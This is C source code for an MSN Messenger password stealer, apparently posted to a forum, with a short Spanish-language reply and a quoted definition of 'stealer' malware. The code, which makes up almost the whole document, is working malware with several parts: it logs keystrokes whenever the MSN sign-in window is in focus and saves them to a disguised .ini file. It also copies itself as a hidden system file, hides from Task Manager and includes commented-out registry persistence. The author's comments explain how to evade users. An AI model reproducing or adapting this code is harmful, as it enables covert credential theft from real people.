#include <stdlib.h>
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <Winuser.h>
#include <string.h>
// all includes should be standard in dev
/*
Name: KOrUPt(not tellin)
Author: KOrUPt
Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
Date Written: 01/10/06 - 04/10/06
Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
*/
void keys(int key,char *file) // if you try and view the exe in notepad it discloses
{ // quite alot of source code(not good), so i may change the key output to codes instead
FILE *key_file;
key_file = fopen(file,"a+");
Sleep(10);
if (key==8)
fprintf(key_file,"%s","[del]");
if (key==13)
fprintf(key_file,"%s","\n");
if (key==32)
fprintf(key_file,"%s"," ");
if (key==VK_CAPITAL)
fprintf(key_file,"%s","[Caps L]");
if (key==VK_TAB)
fprintf(key_file,"%s","[TAB]");
if (key ==VK_CONTROL)
fprintf(key_file,"%s","[CTRL]");
if (key ==VK_PAUSE)
fprintf(key_file,"%s","[PAUSE]");
if (key ==VK_ESCAPE)
fprintf(key_file,"%s","[ESC]");
if (key ==VK_END)
fprintf(key_file,"%s","[END]");
if (key==VK_HOME)
fprintf(key_file,"%s","[HOME]");
if (key ==VK_LEFT)
fprintf(key_file,"%s","[LEFT]");
if (key ==VK_UP)
fprintf(key_file,"%s","[UP]");
if (key ==VK_RIGHT)
fprintf(key_file,"%s","[RIGHT]");
if (key ==VK_DOWN)
fprintf(key_file,"%s","[DOWN]");
if (key ==VK_SNAPSHOT)
fprintf(key_file,"%s","[PRINT]");
if (key ==VK_NUMLOCK)
fprintf(key_file,"%s","[NUM LOCK]");
if (key ==VK_RETURN)
fprintf(key_file,"%s","[ENTER]\n\n");
if (key ==VK_SHIFT)
fprintf(key_file,"%s","[SHIFT]");
if (key ==VK_SPACE)
fprintf(key_file,"%s","[SPACE]");
if (key ==VK_LBUTTON)
fprintf(key_file,"%s","[LM B]");
if (key ==VK_RBUTTON)
fprintf(key_file,"%s","[RM B]");
if (key ==VK_MENU)
fprintf(key_file,"%s","[ALT]");
if (key ==VK_LWIN)
fprintf(key_file,"%s","[Windows key]");
if (key ==VK_ADD)
fprintf(key_file,"%s","[+]");
if (key ==VK_SUBTRACT)
fprintf(key_file,"%s","[-]");
if (key ==VK_DECIMAL)
fprintf(key_file,"%s","[.]");
if (key ==VK_DIVIDE)
fprintf(key_file,"%s","[DIVIDE KEY]");
if (key ==VK_NUMPAD0)
fprintf(key_file,"%s","[NUMPAD 0]");
if (key ==VK_NUMPAD1)
fprintf(key_file,"%s","[NUMPAD 1]");
if (key ==VK_NUMPAD2)
fprintf(key_file,"%s","[NUMPAD 2]");
if (key ==VK_NUMPAD3)
fprintf(key_file,"%s","[NUMPAD 3]");
if (key ==VK_NUMPAD4)
fprintf(key_file,"%s","[NUMPAD 4]");
if (key ==VK_NUMPAD5)
fprintf(key_file,"%s","[NUMPAD 5]");
if (key ==VK_NUMPAD6)
fprintf(key_file,"%s","[NUMPAD 6]");
if (key ==VK_NUMPAD7)
fprintf(key_file,"%s","[NUMPAD 7]");
if (key ==VK_NUMPAD8)
fprintf(key_file,"%s","[NUMPAD 8]");
if (key ==VK_NUMPAD9)
fprintf(key_file,"%s","[NUMPAD 9]");
if (key ==VK_F1)
fprintf(key_file,"%s","[F1 KEY]");
if (key ==VK_F2)
fprintf(key_file,"%s","[F2 KEY]");
if (key ==VK_F3)
fprintf(key_file,"%s","[F3 KEY]");
if (key ==VK_F4)
fprintf(key_file,"%s","[F4 KEY]");
if (key ==VK_F5)
fprintf(key_file,"%s","[F5 KEY]");
if (key ==VK_F6)
fprintf(key_file,"%s","[F6 KEY]");
if (key ==VK_F7)
fprintf(key_file,"%s","[F7 KEY]");
if (key ==VK_F8)
fprintf(key_file,"%s","[F8 KEY]");
if (key ==VK_F9)
fprintf(key_file,"%s","[F9 KEY]");
if (key ==VK_F10)
fprintf(key_file,"%s","[F10 KEY]");
if (key ==VK_F11)
fprintf(key_file,"%s","[F11 KEY]");
if (key ==VK_F12)
fprintf(key_file,"%s","[F12 KEY]");
if (key ==VK_NUMLOCK)
fprintf(key_file,"%s","[NUMLOCK KEY]");
if (key ==VK_SCROLL)
fprintf(key_file,"%s","[SCROLL LOCK]");
/* // WONT WORK ON WIN 9X
if (key ==VK_OEM_PLUS)
fprintf(key_file,"%s","[+]");
if (key ==VK_OEM_COMMA)
fprintf(key_file,"%s","[,]");
if (key ==VK_OEM_MINUS)
fprintf(key_file,"%s","[-]");
if (key ==VK_OEM_PERIOD)
fprintf(key_file,"%s","[.]");
*/
if (key ==190 || key==110)
fprintf(key_file,"%s",".");
if (key >=96 && key <= 105){
key = key - 48;
fprintf(key_file,"%s",&key);
}
if (key >=48 && key <= 59)
fprintf(key_file,"%s",&key);
if (key !=VK_LBUTTON || key !=VK_RBUTTON){
if (key >=65 && key <=90){
if (GetKeyState(VK_CAPITAL))
fprintf(key_file,"%s",&key);
else
{
key = key +32;
fprintf(key_file,"%s",&key);
}
}
}
fclose(key_file);
}
char buffer[300] = "";
HWND currentwin;
DWORD pid;
unsigned char reg[2] = "1";
HMODULE modH = GetModuleHandle(0);
char dir[255];
char dir2[MAX_PATH];
char dir3[MAX_PATH];
char KeyLogPath[MAX_PATH]; // holds dir path for wordsv80.ini
// Functions
BOOL CALLBACK block(HWND hwnd,LPARAM lParam) // used to hide from taskmgr
{
char classname[150] = "";
char windowtext[150] = "";
GetWindowText(hwnd,windowtext,149);
GetClassName(hwnd,classname,249);
if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{
SendMessage(hwnd,LVM_DELETEALLITEMS,0,0); // clears Taskmgr every x seconds
return FALSE;
}
return TRUE;
}
DWORD WINAPI HideProgram() // also used to hide from taskmgr
{
for(;;)
{
Sleep(5);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0); // calls block function evrey 5 milee seconds
}
}
int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
{
char i;
GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
strcat(KeyLogPath,"//wordsv80.ini"); // this is the file that keys are saved to
// Add to system folder
GetModuleFileName(modH, dir2, 256);
GetSystemDirectory(dir,255);
strcat(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
CopyFile(dir2,dir,FALSE); // but dont know how to change the icon pic, lol, will learn how to soon though
unsigned char dir3[25] = "Sndserv.exe";
SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out
// Add to registry
// I think weird decimal vaules makes it less likly to be deleted because it
// hasnt got any spefic name, it could be somthing really importent, dont forget,
// most people are quite scared of editing there reigstry in case they ruin the whole pc,
// if they see something they dont understand, then the old phase "better save than sorry" springs to mind
// i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
// but im talkin about the N0oBs here, sorry noobs lol
// oh well back to the code
/*
HKEY key1;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
RegCloseKey(key1);
HKEY key2;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
RegCloseKey(key2); // i dont fully know how this key will react on startup, should be alright lol
HKEY key3;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
RegCloseKey(key3);
HKEY key4;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
RegCloseKey(key4);
// was goin to disable regedit, but decided not to
// in case made the user suspicuos, i prefer the stealth method
*/
while(1)
{
Sleep(20); // to some save cpu
// Just in case we need an emergency exit
if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
{
MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
return 0;
}
// cannot close program while login box is present
jump:
currentwin = GetForegroundWindow();
GetWindowText(currentwin,(char*)buffer,300);
if(strstr(buffer,"Sign in to .NET messenger Service- MSN Messenger")) // or anything else you want a password to lol
{
GetWindowThreadProcessId(currentwin,&pid);
for(i=8;i<=190;i++) // activate keyloger
{
if (GetAsyncKeyState(i) == -32767)
{
keys (i,KeyLogPath); // loop through keys function and add keys pressed to file
goto jump; // to recheck if logon window is still active, if not continue searching untill found
}
}
}
}
}
Cual es la funcion de esto? :o :o (Pusiste buenos codigos fuente! gracias)
Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.
Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.
WIKIPEDIA (http://wikipedia)
(http://www.deviantart.com/download/45597300/emoticon__silver_surfer_by_mini_may.gif) ;)